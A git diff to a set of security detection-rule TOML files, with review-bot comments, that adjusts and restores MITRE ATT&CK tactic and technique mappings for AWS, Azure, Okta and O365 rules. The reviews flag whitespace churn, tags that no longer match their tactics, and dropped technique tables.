d9d60e52102..5f1cc7fac8e 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -68,6 +68,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "esql" 
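Review bot: The line added inside the `tags = [` array of credential_access_entra_id_device_reg_via_oauth_redirection.toml (hunk `@@ -58,6 +58,7 @@`) is empty — the hunk inserts one content-less line right before the closing `]`, which reads like a leftover of a scripted tag removal rather than an intended edit. The same empty line is added to credential_access_identity_user_account_lockouts.toml (third hunk on this line), credential_access_okta_aitm_session_cookie_replay.toml, initial_access_okta_user_attempted_unauthorized_access.toml and initial_access_sign_in_events_via_third_party_idp.toml. Drop the added line in each so the array keeps its previous shape; if a tag removal was intended here, that removal is not in the hunk. If the line is whitespace-only rather than empty the point is the same.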
@@ -153,3 +154,19 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index cb297e6c510..be7927c5f2b 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -86,11 +86,6 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml index 0ce83d4a339..10b2649fc72 100644 --- a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml +++ b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml 
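Review bot: The new `[[rule.threat]]` block appended to credential_access_identity_user_account_lockouts.toml (hunk `@@ -153,3 +154,19 @@`) has no blank line separating it from the preceding `reference = "https://attack.mitre.org/tactics/TA0006/"` and none between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]`, unlike every other threat block in this diff, which puts a blank line at both places. Insert those two blank lines so the block matches the surrounding layout. This hunk also introduces a TA0001 Initial Access tactic for the rule, while the tags hunk earlier in the same file shows only `"Tactic: Credential Access"` in its context; the other rule files here keep a `Tactic:` tag per threat tactic, so `"Tactic: Initial Access"` should be added to `tags` unless it already appears outside the visible context lines.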
@@ -109,23 +109,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index 5d362666fe7..39689dd40f6 100644 --- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -92,20 +92,3 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index 49f0b900a26..a71ae74e7dd 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml 
@@ -90,23 +90,6 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 1c9ca26250d..52bd075b206 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -89,6 +89,7 @@ tags = [ "Tactic: Credential Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "esql" @@ -183,24 +184,6 @@ id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" 
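Review bot: credential_access_okta_aitm_session_cookie_replay.toml keeps `"Tactic: Lateral Movement"` in `tags` (context of hunk `@@ -89,6 +89,7 @@`), but the following hunk in the same file (`@@ -183,24 +184,6 @@`) removes the `[rule.threat.tactic]` block for TA0008 Lateral Movement and leaves the surviving T1550.004 Web Session Cookie entry mapped to TA0005 Defense Evasion, which is the opposite of the other hunks in this diff, where the duplicated Defense Evasion entries are the ones dropped. Unless another threat entry outside the hunk still carries TA0008, the tag no longer has a matching tactic. If the intent was to deduplicate the two T1550.004 entries, keep Lateral Movement on the surviving one, i.e. `id = "TA0008"`, `name = "Lateral Movement"`, `reference = "https://attack.mitre.org/tactics/TA0008/"`, and remove the Defense Evasion tactic instead; otherwise remove the `"Tactic: Lateral Movement"` tag so tags and threat agree.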
diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 86fc7707a90..ce1e17c9cf2 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml @@ -88,21 +88,3 @@ reference = "https://attack.mitre.org/techniques/T1489/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml index 0735762b208..e99fc028bfc 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml @@ -94,21 +94,3 @@ reference = "https://attack.mitre.org/techniques/T1489/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index f630bd79c29..3d7fbd734dc 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -90,16 +90,3 @@ framework = "MITRE ATT&CK" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index a533da4badf..9c026e9aac9 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -96,23 +96,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] 
diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index ce13789eee4..701332ba9c9 100644 --- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -65,6 +65,7 @@ tags = [ "Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "query" @@ -95,14 +96,6 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index afd4246e872..8589d5de25a 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml +++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -74,6 +74,7 @@ tags = [ "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "new_terms" @@ -135,11 +136,6 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" 
diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 100a80ef79b..b44a3a4bf4a 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -94,23 +94,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index a651b18fce8..25a9fa908ba 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml 
@@ -103,23 +103,6 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["okta.actor.id"] value = 1 From 62bcb8977f7ecb64630bd6f770336264c5b2b245 Mon Sep 17 00:00:00 2001 
From: Mika Ayenson Date: Wed, 25 Mar 2026 12:15:53 -0500 Subject: [PATCH 15/16] reset rules inadvertently removing mitre mappings --- .../initial_access_console_login_root.toml | 20 +++++- ..._created_access_keys_for_another_user.toml | 7 +- ...tratoraccess_policy_attached_to_group.toml | 24 ++++++- ...stratoraccess_policy_attached_to_role.toml | 24 ++++++- ...stratoraccess_policy_attached_to_user.toml | 24 ++++++- .../azure/ml_azure_rare_event_failures.toml | 49 ++++++------- ...ersistence_automation_account_created.toml | 20 ++++-- ...nce_cluster_admin_rolebinding_created.toml | 20 +++++- ...nsitive_role_creation_or_modification.toml | 20 +++++- ..._service_account_bound_to_clusterrole.toml | 20 +++++- ...harepoint_site_collection_admin_added.toml | 22 +++++- ...icious_activity_reported_by_okta_user.toml | 41 ++++++++++- rules/linux/persistence_at_job_creation.toml | 38 +++++++++- rules/linux/persistence_boot_file_copy.toml | 10 ++- .../linux/persistence_cron_job_creation.toml | 38 +++++++++- .../persistence_systemd_service_creation.toml | 20 +++++- ...tion_ml_linux_anomalous_sudo_activity.toml | 20 ++++-- .../defense_evasion_injection_msbuild.toml | 19 ++++- ...erading_suspicious_werfault_childproc.toml | 30 +++++--- ...e_evasion_parent_process_pid_spoofing.toml | 24 ++++++- .../execution_via_hidden_shell_conhost.toml | 21 ++++-- .../persistence_appcertdlls_registry.toml | 24 ++++++- ...egistry_startup_shell_folder_modified.toml | 24 ++++--- ...sistence_group_modification_by_system.toml | 20 ++++-- ...persistence_msoffice_startup_registry.toml | 24 ++++--- .../persistence_powershell_profiles.toml | 24 ++++++- ...escalation_via_accessibility_features.toml | 30 ++++---- ...stence_suspicious_com_hijack_registry.toml | 41 ++++++++--- ...nce_suspicious_scheduled_task_runtime.toml | 71 ++++--------------- .../persistence_temp_scheduled_task.toml | 24 ++++++- .../persistence_time_provider_mod.toml | 29 +++++--- .../persistence_via_application_shimming.toml | 24 ++++++- 
...emetrycontroller_scheduledtask_hijack.toml | 29 +++++++- ...privilege_escalation_lsa_auth_package.toml | 24 ++++++- ...ge_escalation_persistence_phantom_dll.toml | 29 ++++++-- ...on_port_monitor_print_processor_abuse.toml | 28 +++++++- ...lege_escalation_uac_bypass_com_clipup.toml | 27 +++++-- ...n_uac_bypass_com_interface_icmluautil.toml | 27 +++++-- ...alation_uac_bypass_diskcleanup_hijack.toml | 30 +++++--- ...escalation_uac_bypass_dll_sideloading.toml | 30 ++++++-- ...ge_escalation_uac_bypass_event_viewer.toml | 24 ++++++- ...n_unusual_svchost_childproc_childless.toml | 30 ++++---- ...ommand_and_control_bitsadmin_activity.toml | 26 +++---- ...fense_evasion_injection_from_msoffice.toml | 41 ++++------- ...defense_evasion_service_path_registry.toml | 33 +++++---- .../defense_evasion_services_exe_path.toml | 33 +++++---- ...e_iam_instance_request_to_iam_service.toml | 16 +++-- 47 files changed, 932 insertions(+), 341 deletions(-) diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index 8ac3d7d8659..a8842b9754b 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -133,12 +133,10 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" 
@@ -148,3 +146,19 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml index be58e3a20a7..6a4dcd371c0 100644 --- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml +++ b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -158,17 +158,17 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -191,7 +191,6 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", 
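Review bot: The restored `[[rule.threat]]` entry for `TA0004` in `@@ -148,3 +146,19 @@` is appended with no blank line after the preceding `reference` line, no blank lines between its tables, and a trailing empty `+` line, while the `@@ -133,12 +133,10 @@` hunk above deletes the blank lines the file previously had between tables — so this is not a byte-for-byte revert but a hand-pasted block. Re-serializing the rule through the project's TOML writer would restore the conventional one-blank-line spacing and avoid this whitespace churn in a commit whose purpose is to undo an accidental change. Because the resulting content differs from the earlier revision, moving `updated_date` backwards to `"2026/01/16"` in the `@@ -2,7 +2,7 @@` hunk may understate when the mapping last changed; if the repo's checks compare that date against the locked version, it is worth confirming before merge. The same pattern (inter-table blank lines removed, restored block pasted with runs of two or three empty `+` lines) recurs in persistence_iam_user_created_access_keys_for_another_user.toml on this line, the three privilege_escalation_iam_administratoraccess_policy_attached_to_* files, persistence_automation_account_created.toml, privilege_escalation_sharepoint_site_collection_admin_added.toml, initial_access_suspicious_activity_reported_by_okta_user.toml, privilege_escalation_ml_linux_anomalous_sudo_activity.toml, defense_evasion_injection_msbuild.toml, defense_evasion_masquerading_suspicious_werfault_childproc.toml, defense_evasion_parent_process_pid_spoofing.toml and execution_via_hidden_shell_conhost.toml.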
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 2d378e9d56b..7a16cf870c9 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -121,21 +121,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index c3021be1173..87734bebf8d 100644 
--- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -119,21 +119,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index 3f13e220c2a..f694877d86f 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,21 +123,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index 98a52ccc75f..9e1182f57d9 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/24" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -91,6 +91,11 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" 
@@ -101,34 +106,9 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -137,6 +117,14 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -145,7 +133,16 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index ce9b522545d..222286c88de 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml 
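Review bot: The `@@ -101,34 +106,9 @@` hunk removes the `T1078`/`T1078.004` and `T1098`/`T1098.003` technique tables from the `TA0004` Privilege Escalation entry without restoring them anywhere, leaving that entry with a tactic and no techniques, which runs against the commit's stated purpose of putting inadvertently removed MITRE mappings back; unless the `2025/12/08` revision genuinely had a technique-less Privilege Escalation entry, those four tables should be re-added under it. The `@@ -91,6 +91,11 @@` hunk also moves `[rule.threat.tactic]` for `TA0007` above the `[[rule.threat.technique]]` tables, which TOML accepts (both attach to the most recent `[[rule.threat]]` element) but differs from every other rule in this patch where the tactic table closes the entry; keeping the tactic last avoids a reader assuming the techniques belong to a different entry. Technique losses of the same kind appear in persistence_automation_account_created.toml (`T1078.004` dropped from the Persistence entry), privilege_escalation_ml_linux_anomalous_sudo_activity.toml (`T1548.003` dropped) and defense_evasion_masquerading_suspicious_werfault_childproc.toml (`T1112` dropped), each worth checking against the base revision before treating this as a clean reset.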
